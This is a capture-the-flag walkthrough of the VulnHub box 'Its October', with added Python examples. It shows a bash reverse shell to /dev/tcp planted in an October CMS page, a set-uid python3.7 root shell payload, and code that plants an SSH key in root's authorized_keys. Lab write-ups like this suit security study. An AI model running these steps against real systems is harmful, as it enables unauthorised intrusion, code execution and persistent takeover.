Its October walkthrough

MachineX
Published in Armour Infosec
5 min read · Apr 12, 2020

Greetings, hacker-world! 👽 Here I am again with another great VulnHub box, Its October. Get the box from the following link:

https://www.infosecwarrior.com/its-october/

This machine has something unique to offer: it teaches you how to exploit a CMS even when you can't find any known vulnerability for it. Without further ado, let's get started:

Methodology applied :

Host discovery

  • netdiscover

Enumeration

  • nmap
  • nikto
  • gobuster

Exploit the web

  • placing our reverse shell (this is the important step!)

Privilege escalation

  • abusing a SUID binary

Let the hacking begin..

→Host discovery

To find the IP of the machine I used netdiscover. Since I attached a host-only adapter to the VM, the interface to scan is vboxnet0.

┌─[✗]─[root@machine]─[~/mine/october]
└──╼ #netdiscover -i vboxnet0

We see that the target has the IP 192.168.56.33.

→Enumeration

First we scan the target for services. For this we use nmap's aggressive scan (-A adds OS and version detection, default scripts and traceroute; -p- covers all 65535 ports):

┌─[✗]─[root@machine]─[~/mine/october]
└──╼ #nmap -sV -A -p- -v 192.168.56.33

We see that ports 80 and 8080 are open, so without a second thought we open both in the browser.

PORT 80

It's just a normal website. We don't know which CMS it runs yet, and there is nothing useful in the page source either. OK, let's move on.

PORT 8080

This is also a simple web page. Let's check its page source.

There is a commented-out link pointing to an image. Let's open it.

Here we find some credentials. We don't know where they are used yet, but they will certainly be needed later on, so note them down rather than ignoring them.

Now we run nikto for further enumeration of the web server:

┌─[✗]─[root@machine]─[~/mine/october]
└──╼ #nikto -h http://192.168.56.33/

Nothing worth paying attention to. Next, gobuster for directory brute-forcing:

┌─[root@machine]─[~/mine/october]
└──╼ #gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.56.33/

The brute-force returns several directories, but look carefully at the status codes: every one of them returns 301, while a single directory, /backend, returns 302. A 301 on a bare directory name is usually just the web server redirecting to the trailing-slash form of a real directory, whereas a 302 is typically issued by the application itself (for instance to send an unauthenticated visitor to a login page), so /backend is where the application logic lives. Let's try it.
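Added example (not from the original post): a small Python triage of gobuster output that automates the 301-versus-302 reasoning above. The sample lines are constructed in the one-hit-per-line format gobuster 3.1 prints, with sizes and the login URL made up to mirror what the post describes; the check that matters is whether a redirect's target is just the path with a trailing slash (the web server's doing) or somewhere else entirely (the application's doing).

```python
import re
from urllib.parse import urlparse

# gobuster v3 prints one hit per line; the [--> ...] part, when present,
# is the Location header of a redirect.
GOBUSTER_LINE = re.compile(
    r"^(?P<path>/\S*)\s+\(Status:\s*(?P<status>\d{3})\)"
    r"(?:\s*\[Size:\s*\d+\])?"
    r"(?:\s*\[-->\s*(?P<location>\S+)\])?"
)

REDIRECTS = {301, 302, 303, 307, 308}

# Constructed sample, modelled on the post's findings: sizes, the login
# URL and the extra paths are made up.
SAMPLE_OUTPUT = """\
/images               (Status: 301) [Size: 315] [--> http://192.168.56.33/images/]
/css                  (Status: 301) [Size: 312] [--> http://192.168.56.33/css/]
/themes               (Status: 301) [Size: 315] [--> http://192.168.56.33/themes/]
/backend              (Status: 302) [Size: 0] [--> http://192.168.56.33/backend/backend/auth/signin]
/index.php            (Status: 200) [Size: 4105]
/server-status        (Status: 403) [Size: 278]
"""


def parse_gobuster(text):
    """Turn gobuster's text output into dicts of path / status / location."""
    hits = []
    for line in text.splitlines():
        m = GOBUSTER_LINE.match(line.strip())
        if m:
            hits.append({"path": m["path"], "status": int(m["status"]),
                         "location": m["location"]})
    return hits


def triage(hit):
    """Classify a hit by what its redirect (if any) tells us."""
    status, path, location = hit["status"], hit["path"], hit["location"]
    if status in REDIRECTS:
        if location is None:
            # gobuster 3.0 and older print no Location: re-check with curl -I
            return "redirect-unknown"
        target = urlparse(location).path
        if target == path.rstrip("/") + "/":
            return "directory"      # the server only appended the trailing slash
        return "app-redirect"       # the application chose a different route
    if status in (200, 204):
        return "content"
    if status in (401, 403):
        return "restricted"
    return "other"


def interesting(text):
    """Paths whose redirect target is not just their own trailing-slash form."""
    return [h["path"] for h in parse_gobuster(text)
            if triage(h) == "app-redirect"]


if __name__ == "__main__":
    for hit in parse_gobuster(SAMPLE_OUTPUT):
        print(f"{hit['path']:<20} {hit['status']}  {triage(hit)}")
    print("follow up:", interesting(SAMPLE_OUTPUT))
```

On older gobuster builds that print no Location, the same split is a `curl -I` per 30x hit away: a Location of the path plus `/` is the server, anything else is the application.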

We get redirected to a login page. A bit of googling reveals the CMS: it is October CMS (its backend lives at /backend by default). Now is the time to remember the credentials we found a few moments ago. Let's try them here:

And…we get in! First checkpoint reached, you could say!

→ Exploit the web (placing the shell)

IMPORTANT NOTE: placing a reverse shell in this CMS is a bit different from doing it in WordPress or Drupal. Searching for October CMS exploits turns up several, but as far as I can tell they are all patched in the version running here: they target build 412 and this box runs build 465, so none of them works. Uploading a .php file through the backend doesn't work either, because that extension is blocked. After a lot of reading I finally found the answer: the CMS lets a backend user write PHP in a page's code section, as long as it sits inside a function. This is not a vulnerability in the usual sense but a feature of the product, which is why no advisory covers it; the consequence is that any backend account with CMS editing rights has code execution on the server. (October's config/cms.php has an enableSafeMode option that disables the PHP code section for exactly this reason; if you administer an October site, turn it on.)
Let's see how:

Open the CMS tab on the dashboard and click +ADD:

We now have a new page. Give it a name (and URL) of your choice. At the bottom there are two sections, Markup and Code.
Here's what goes in each:

  • Markup: any HTML; this is the view (I copied the markup from the homepage)
  • Code: a tiny PHP reverse shell. It has to be placed inside a function: October compiles the code section into a class, so a bare statement outside a function is rejected, whereas onStart() runs every time the page is rendered:

      function onStart()
      {
          // connect back to the attacker box; >& sends stderr as well, so the prompt is visible
          exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/1234 0>&1'");
      }

KEEP IN MIND: the exec() call must be inside the function, as shown above; on its own it will not be accepted.

Save it!
Now start a listener on your machine and request the page in the browser.

Congrats, second checkpoint reached!
Next we try to turn the dumb shell we have into an interactive one. But plain python is not installed on this box: checking for it returns nothing:

After wandering through the directories we find nothing except a local user named armour. Then we check for SUID binaries:

Among them is python3.7, so the box does have a Python after all. We use python3.7 to spawn a pty and get an interactive shell.

→Privilege escalation

Now for privilege escalation we write our exploit for the SUID python3.7:

You can also find the exploit at the following link:

https://gtfobins.github.io/gtfobins/python/

Run the exploit with python3.7:

BOOM!! 🔥🔥🔥 We have the flag and an effective uid of root!!
But our work doesn't end here: we still want a proper root shell, and a little thinking gets us there.
Use scp to move your SSH public key onto the box and append it to root's authorized_keys, then log in as root with the matching private key.
The following screenshot shows the next few steps, all in one:
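Added example (not the post's own exploit, which is only shown as a screenshot): Python covering both the SUID hunt and what to do with a set-uid python3.7. find_suid() is the search for set-uid files the post runs before spotting python3.7; suid_shell_argv() builds the GTFOBins command the post links, plus a variant that calls setuid(0) first so the real uid becomes 0 as well, which makes the SSH-key detour unnecessary; install_authorized_key() is that authorized_keys step anyway, with the permissions sshd insists on. demo() exercises everything against a throw-away temporary directory (a fake set-uid file owned by the current user and a made-up public key) so it runs as an unprivileged user; the interpreter path, key text and directory names are assumptions for the demo.

```python
import os
import stat
import tempfile


def find_suid(root="/", require_root_owner=True):
    """Regular files under root with the set-uid bit (find / -perm -4000 -type f).

    Symlinks are skipped (lstat) and unreadable directories are ignored, which
    is what you want when walking a whole box as a low-privileged user.
    """
    found = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if require_root_owner and st.st_uid != 0:
                continue
            found.append(path)
    return sorted(found)


# Payload run *inside* the set-uid interpreter. The first is the GTFOBins
# one-liner: the kernel set euid=0 on exec, and sh -p keeps it (uid stays the
# low-privileged user, which is the "euid of root" the post describes).
PAYLOAD_EUID_ONLY = "import os; os.execl('/bin/sh', 'sh', '-p')"
# A process whose euid is 0 may call setgid(0)/setuid(0), which sets real,
# effective and saved ids to 0: the resulting shell is simply root.
PAYLOAD_REAL_ROOT = ("import os; os.setgid(0); os.setuid(0); "
                     "os.execl('/bin/sh', 'sh')")


def suid_shell_argv(interpreter, real_root=True):
    """argv that execs the set-uid interpreter with the chosen payload."""
    payload = PAYLOAD_REAL_ROOT if real_root else PAYLOAD_EUID_ONLY
    return [interpreter, "-c", payload]


def exploit(interpreter="/usr/bin/python3.7", real_root=True):
    """Replace this process with the set-uid interpreter; never returns on success."""
    argv = suid_shell_argv(interpreter, real_root)
    os.execv(argv[0], argv)


def install_authorized_key(pubkey, home="/root"):
    """Append pubkey to <home>/.ssh/authorized_keys once, with 0700/0600 modes.

    With euid 0 this works on /root and gives a clean SSH login afterwards.
    """
    ssh_dir = os.path.join(home, ".ssh")
    os.makedirs(ssh_dir, exist_ok=True)
    os.chmod(ssh_dir, 0o700)
    path = os.path.join(ssh_dir, "authorized_keys")
    key = pubkey.strip()
    try:
        with open(path) as fh:
            present = key in fh.read().splitlines()
    except FileNotFoundError:
        present = False
    if not present:
        with open(path, "a") as fh:
            fh.write(key + "\n")
    os.chmod(path, 0o600)
    return path


def demo():
    """Offline run against a temporary tree: one fake set-uid 'python3.7'
    (owned by us, so require_root_owner=False), one normal binary, and a
    made-up key installed twice to show it is not duplicated."""
    base = tempfile.mkdtemp(prefix="october-demo-")
    bindir = os.path.join(base, "usr", "bin")
    os.makedirs(bindir)
    fake_py = os.path.join(bindir, "python3.7")
    for name, mode in (("python3.7", 0o4755), ("ls", 0o755)):
        with open(os.path.join(bindir, name), "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(os.path.join(bindir, name), mode)
    key = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyNotReal attacker@kali"  # constructed
    ak = install_authorized_key(key, home=os.path.join(base, "root"))
    install_authorized_key(key, home=os.path.join(base, "root"))
    with open(ak) as fh:
        contents = fh.read()
    return {
        "suid": find_suid(base, require_root_owner=False),
        "argv": suid_shell_argv(fake_py),
        "authorized_keys": contents,
        "mode": stat.S_IMODE(os.stat(ak).st_mode),
    }


if __name__ == "__main__":
    print(demo())
```

On the real box the call is exploit("/usr/bin/python3.7") from the armour shell; with real_root=True there is nothing left to do afterwards, with real_root=False you are where the post is and install_authorized_key() is the way to a persistent root login.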

OK! Now you properly own the box, with all the powers. 🌟
Remember one thing: hacking is all about being creative and a little logical. Hope you enjoyed rooting this box.

HAPPY HACKING, fellas!
